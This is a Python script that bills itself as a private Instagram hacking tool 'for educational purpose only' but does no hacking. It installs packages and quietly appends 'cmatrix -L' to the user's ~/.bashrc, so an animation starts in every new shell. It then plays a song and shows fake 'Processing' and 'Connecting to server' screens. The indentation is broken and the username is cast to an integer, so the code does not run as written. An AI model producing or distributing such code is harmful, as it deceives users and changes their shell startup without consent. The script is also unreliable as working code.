#!/bin/python
import os
import time
import sys
def load(word):
	for char in word:
		print(char,end='')
		sys.stdout.flush()
		time.sleep(0.2)
def bash():
    print("██╗ ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗")
    print("██║██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝")
    print("██║██║  ███╗█████╗███████║███████║██║     █████╔╝")
    print("██║██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗") 
    print("██║╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗")
    print("╚═╝ ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝")                                                 
	time.sleep(3)
	os.system("echo 'cmatrix -L' >> ~/.bashrc")


os.system("apt install cmatrix")
os.system("echo 'cmatrix -L' >> ~/.bashrc")
os.system("apt install mpv")
os.system("clear")
print("Please wait, you can run this tool after this song..\n")
time.sleep(4)
print("Playing song..")
os.system("mpv BL4CK-4L13N.mp3")
os.system("clear")
print("\033[33m")
print("-----This is a private Instagram hacking tool  please use it educational purpose only-----")
time.sleep(4)
os.system('clear')
print("\033[32;1m")
print("██╗ ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗")
print("██║██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝")
print("██║██║  ███╗█████╗███████║███████║██║     █████╔╝")
print("██║██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗") 
print("██║╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗")
print("╚═╝ ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝")                                                 
time.sleep(3)

u_choice=int(input('Enter username :  '))
     os.system("clear")
     print("Processing please wait -")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait /")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait |")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait \ ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait - ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait /")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait |")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait \ ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait - ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait /")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait |")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait \ ")
     time.sleep(1)
     os.system("clear")
     print("Processing please wait - ")
     time.sleep(1)
     os.system("clear")
     load('Connecting to server.....\n')
     bash()
time.sleep(3)
os.system("cmatrix -L")